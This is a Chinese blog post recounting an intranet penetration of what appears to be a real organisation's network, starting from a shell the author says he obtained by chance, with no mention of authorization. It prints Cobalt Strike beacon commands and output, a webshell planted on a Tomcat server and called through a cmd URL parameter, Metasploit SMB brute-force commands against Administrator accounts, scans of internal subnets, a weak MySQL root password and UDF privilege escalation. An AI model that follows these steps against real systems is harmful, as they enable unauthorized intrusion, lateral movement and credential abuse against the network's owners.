记一次内网渗透

作者: print("") 分类: 信息安全 发布时间: 2019-10-15 10:38

无意中拿到了一个shell 然后花了几天内网渗透。还是有点收获的

没啥技巧可言了。都是一些瞎操作了。别喷就行了

先介绍一下环境把 


WEB: 内网主机 192.168.1.231   (无域控。就是工作组)

数据库:  192.168.2.150   (MSSQL )

拿到shell 之后 看了一下systeminfo

OS 名称:          Microsoft Windows Server 2008 R2 Standard 
OS 版本:          6.1.7601 Service Pack 1 Build 7601
OS 制造商:        Microsoft Corporation
OS 配置:          独立服务器
OS 构件类型:      Multiprocessor Free
注册的所有人:     Windows 用户
注册的组织:       
处理器:           安装了 4 个处理器。
                  [01]: Intel64 Family 6 Model 37 Stepping 1 GenuineIntel ~1995 Mhz
                  [02]: Intel64 Family 6 Model 37 Stepping 1 GenuineIntel ~1995 Mhz
                  [03]: Intel64 Family 6 Model 37 Stepping 1 GenuineIntel ~1995 Mhz
                  [04]: Intel64 Family 6 Model 37 Stepping 1 GenuineIntel ~1995 Mhz
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00) 北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:     32,768 MB
可用的物理内存:   28,347 MB
虚拟内存: 最大值: 65,533 MB
虚拟内存: 可用:   60,619 MB
虚拟内存: 使用中: 4,914 MB
域:               WORKGROUP
登录服务器:       暂缺
修补程序:         安装了 278 个修补程序。
                  [01]: KB981391
                  [02]: KB981392
                  [03]: KB977236
                  [04]: KB981111
                  [05]: KB977238
                  [06]: KB2849697
                  [07]: KB2849696
                  [08]: KB2841134
                  [09]: KB2841134
                  [10]: KB977239
                  [11]: KB2670838
                  [12]: KB981390
                  [13]: KB2386667
                  [14]: KB2506014
                  [15]: KB2506212
                  [16]: KB2506928
                  [17]: KB2509553
                  [18]: KB2511455
                  [19]: KB2536275
                  [20]: KB2544893
                  [21]: KB2545698
                  [22]: KB2547666
                  [23]: KB2552343
                  [24]: KB2560656
                  [25]: KB2563227
                  [26]: KB2564958
                  [27]: KB2570947
                  [28]: KB2585542
                  [29]: KB2603229
                  [30]: KB2604115
                  [31]: KB2607047
                  [32]: KB2608658
                  [33]: KB2620704
                  [34]: KB2621440
                  [35]: KB2631813
                  [36]: KB2640148
                  [37]: KB2643719
                  [38]: KB2653956
                  [39]: KB2654428
                  [40]: KB2656356
                  [41]: KB2660075
                  [42]: KB2667402
                  [43]: KB2676562
                  [44]: KB2685811
                  [45]: KB2685813
                  [46]: KB2685939
                  [47]: KB2690533
                  [48]: KB2698365
                  [49]: KB2705219
                  [50]: KB2706045
                  [51]: KB2712808
                  [52]: KB2718704
                  [53]: KB2719033
                  [54]: KB2719857
                  [55]: KB2726535
                  [56]: KB2729094
                  [57]: KB2729452
                  [58]: KB2732059
                  [59]: KB2736422
                  [60]: KB2742599
                  [61]: KB2750841
                  [62]: KB2758857
                  [63]: KB2761217
                  [64]: KB2763523
                  [65]: KB2765809
                  [66]: KB2770660
                  [67]: KB2786081
                  [68]: KB2789645
                  [69]: KB2791765
                  [70]: KB2798162
                  [71]: KB2800095
                  [72]: KB2807986
                  [73]: KB2808679
                  [74]: KB2813430
                  [75]: KB2834140
                  [76]: KB2836942
                  [77]: KB2836943
                  [78]: KB2839894
                  [79]: KB2840149
                  [80]: KB2840631
                  [81]: KB2843630
                  [82]: KB2852386
                  [83]: KB2853952
                  [84]: KB2861698
                  [85]: KB2862152
                  [86]: KB2862330
                  [87]: KB2862335
                  [88]: KB2864202
                  [89]: KB2868038
                  [90]: KB2868116
                  [91]: KB2868626
                  [92]: KB2871997
                  [93]: KB2884256
                  [94]: KB2888049
                  [95]: KB2891804
                  [96]: KB2892074
                  [97]: KB2893294
                  [98]: KB2893519
                  [99]: KB2894844
                  [100]: KB2900986
                  [101]: KB2908783
                  [102]: KB2911501
                  [103]: KB2912390
                  [104]: KB2919469
                  [105]: KB2929733
                  [106]: KB2931356
                  [107]: KB2937610
                  [108]: KB2943357
                  [109]: KB2957189
                  [110]: KB2966583
                  [111]: KB2968294
                  [112]: KB2970228
                  [113]: KB2972100
                  [114]: KB2972211
                  [115]: KB2973112
                  [116]: KB2973201
                  [117]: KB2973351
                  [118]: KB2976897
                  [119]: KB2977292
                  [120]: KB2978120
                  [121]: KB2984972
                  [122]: KB2985461
                  [123]: KB2987107
                  [124]: KB2991963
                  [125]: KB2992611
                  [126]: KB2993651
                  [127]: KB3003057
                  [128]: KB3003743
                  [129]: KB3004361
                  [130]: KB3004375
                  [131]: KB3005607
                  [132]: KB3006137
                  [133]: KB3006625
                  [134]: KB3008923
                  [135]: KB3010788
                  [136]: KB3011780
                  [137]: KB3018238
                  [138]: KB3019978
                  [139]: KB3020369
                  [140]: KB3020370
                  [141]: KB3021674
                  [142]: KB3022777
                  [143]: KB3023215
                  [144]: KB3030377
                  [145]: KB3031432
                  [146]: KB3033889
                  [147]: KB3033929
                  [148]: KB3035126
                  [149]: KB3035132
                  [150]: KB3037574
                  [151]: KB3040272
                  [152]: KB3042058
                  [153]: KB3042553
                  [154]: KB3045685
                  [155]: KB3046017
                  [156]: KB3046269
                  [157]: KB3054205
                  [158]: KB3054476
                  [159]: KB3055642
                  [160]: KB3059317
                  [161]: KB3060716
                  [162]: KB3068457
                  [163]: KB3068708
                  [164]: KB3071756
                  [165]: KB3072305
                  [166]: KB3072630
                  [167]: KB3074543
                  [168]: KB3075220
                  [169]: KB3075249
                  [170]: KB3076895
                  [171]: KB3078601
                  [172]: KB3078667
                  [173]: KB3080149
                  [174]: KB3080446
                  [175]: KB3084135
                  [176]: KB3086255
                  [177]: KB3087039
                  [178]: KB3092601
                  [179]: KB3092627
                  [180]: KB3097989
                  [181]: KB3101722
                  [182]: KB3107998
                  [183]: KB3108371
                  [184]: KB3108381
                  [185]: KB3108664
                  [186]: KB3108670
                  [187]: KB3109094
                  [188]: KB3109103
                  [189]: KB3109560
                  [190]: KB3110329
                  [191]: KB3118401
                  [192]: KB3121255
                  [193]: KB3122648
                  [194]: KB3123479
                  [195]: KB3124001
                  [196]: KB3124275
                  [197]: KB3126587
                  [198]: KB3127220
                  [199]: KB3133043
                  [200]: KB3133977
                  [201]: KB3135983
                  [202]: KB3137061
                  [203]: KB3138612
                  [204]: KB3138901
                  [205]: KB3139398
                  [206]: KB3139914
                  [207]: KB3139923
                  [208]: KB3139940
                  [209]: KB3140245
                  [210]: KB3140735
                  [211]: KB3142024
                  [212]: KB3142042
                  [213]: KB3145739
                  [214]: KB3146706
                  [215]: KB3146963
                  [216]: KB3147071
                  [217]: KB3148198
                  [218]: KB3148851
                  [219]: KB3149090
                  [220]: KB3153171
                  [221]: KB3153199
                  [222]: KB3153731
                  [223]: KB3154070
                  [224]: KB3156013
                  [225]: KB3156016
                  [226]: KB3156017
                  [227]: KB3156019
                  [228]: KB3159398
                  [229]: KB3160005
                  [230]: KB3161561
                  [231]: KB3161664
                  [232]: KB3161949
                  [233]: KB3161958
                  [234]: KB3162835
                  [235]: KB3163245
                  [236]: KB3164033
                  [237]: KB3164035
                  [238]: KB3167679
                  [239]: KB3168965
                  [240]: KB3170106
                  [241]: KB3170455
                  [242]: KB3172605
                  [243]: KB3175024
                  [244]: KB3175443
                  [245]: KB3177186
                  [246]: KB3177467
                  [247

权限

beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
iis apppool\user11

beacon> shell tasklist
[*] Tasked beacon to run: tasklist
[+] host called home, sent: 39 bytes
[+] received output:

映像名称                       PID 会话名              会话#       内存使用 
========================= ======== ================ =========== ============
System Idle Process              0                            0         24 K
System                           4                            0        368 K
smss.exe                       416                            0      1,928 K
csrss.exe                      512                            0     11,100 K
wininit.exe                    552                            0      6,736 K
csrss.exe                      560                            1     11,988 K
winlogon.exe                   608                            1      6,956 K
services.exe                   656                            0     16,208 K
lsass.exe                      664                            0     32,736 K
lsm.exe                        672                            0      8,784 K
svchost.exe                    768                            0     14,580 K
svchost.exe                    836                            0     12,864 K
svchost.exe                    928                            0     20,888 K
LogonUI.exe                    948                            1     20,680 K
svchost.exe                    988                            0     61,276 K
svchost.exe                    232                            0     21,556 K
svchost.exe                    456                            0     23,472 K
KVSrvXP.exe                    548                            0      8,212 K
ZhuDongFangYu.exe             1076                            0     29,500 K
svchost.exe                   1112                            0     38,116 K
svchost.exe                   1252                            0     15,916 K
spoolsv.exe                   1416                            0     17,660 K
svchost.exe                   1456                            0     16,684 K
SMSvcHost.exe                 1484                            0     25,300 K
tomcat6.exe                   1688                            0    150,264 K
conhost.exe                   1712                            0      5,976 K
vmtoolsd.exe                  1720                            0     31,560 K
svchost.exe                   1760                            0     17,172 K
svchost.exe                   2516                            0     12,728 K
svchost.exe                   2560                            0      7,832 K
msdtc.exe                     2856                            0      9,872 K
LogonUI.exe                   3380                            0     19,416 K
csrss.exe                     9452                            2     19,644 K
winlogon.exe                  8228                            2      8,852 K
taskhost.exe                 10768                            2     17,132 K
rdpclip.exe                  10884                            2     10,792 K
dwm.exe                      10964                            2      8,660 K
explorer.exe                 11012                            2     85,648 K
360sd.exe                    11060                            2      2,880 K
vmtoolsd.exe                 10516                            2     26,124 K
KVMonXP.exe                    500                            2      4,076 K
SiteServer.Service.exe       10552                            2     87,260 K
360hotfix.exe                10576                            2     22,528 K
360tray.exe                   4024                            2     52,228 K
360DesktopLite64.exe          3868                            2    110,332 K
UKeyDetect.exe                3576                            2     16,612 K
conhost.exe                 372888                            0      4,788 K
360rp.exe                   349132                            2     35,320 K
cmd.exe                     385872                            0      4,472 K
conhost.exe                 385508                            0      4,588 K
cmd.exe                     382852                            0      4,484 K
conhost.exe                 383824                            0      4,580 K
rundll32.exe                386844                            0     37,568 K
cmd.exe                     386184                            0      4,512 K
conhost.exe                 380768                            0      4,884 K
w3wp.exe                    403908                            0    594,248 K
w3wp.exe                    408248                            0    483,596 K
dllhost.exe                 415040                            0     13,248 K
TrustedInstaller.exe        413620                            0     17,740 K
cmd.exe                     410940                            0      4,632 K
conhost.exe                 416436                            0      4,864 K
tasklist.exe                416528                            0      7,088 K
WmiPrvSE.exe                416228                            0      9,304 K

发现有一个tomcat6.0 。 找到那个tomcat6 的安装目录。传了一个shell上去。

http://192.168.1.231:8081/manager/images/ccc.jsp?cmd=whoami

权限为system权限。

然后上线到cs 中读取一下密码

——- 先转发到msf 中。通过smb_login   爆破登陆

msf > use auxiliary/scanner/smb/smb_login
msf  auxiliary(smb_login) > show options
msf  auxiliary(smb_login) > set RHOSTS 192.168.1.150-155
msf  auxiliary(smb_login) > set SMBUser Administrator
msf  auxiliary(smb_login) > se SMBPass 123
msf  auxiliary(smb_login) > run

爆破出了三台服务器。统统上线

然后通过CS 的Listen  

反代内网出来

扫描内网。

内网大概如下:

192.168.1.0/24 

192.168.2.0/24

192.168.3.0/24

192.168.4.0/24 

192.168.5.0/24

192.168.6.0/24

192.168.7.0/24

192.168.8.0/24

192.168.10.0/24 

192.168.20.0/24

192.168.30.0/24

192.168.40.0/24 

192.168.50.0/24

192.168.60.0/24

192.168.70.0/24

192.168.80.0/24

扫描端口。探测。发现192.168.1.11 开发3306  密码root root

通过udf 提权 

然后继续上线CS   

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

说点什么

avatar
  Subscribe  
提醒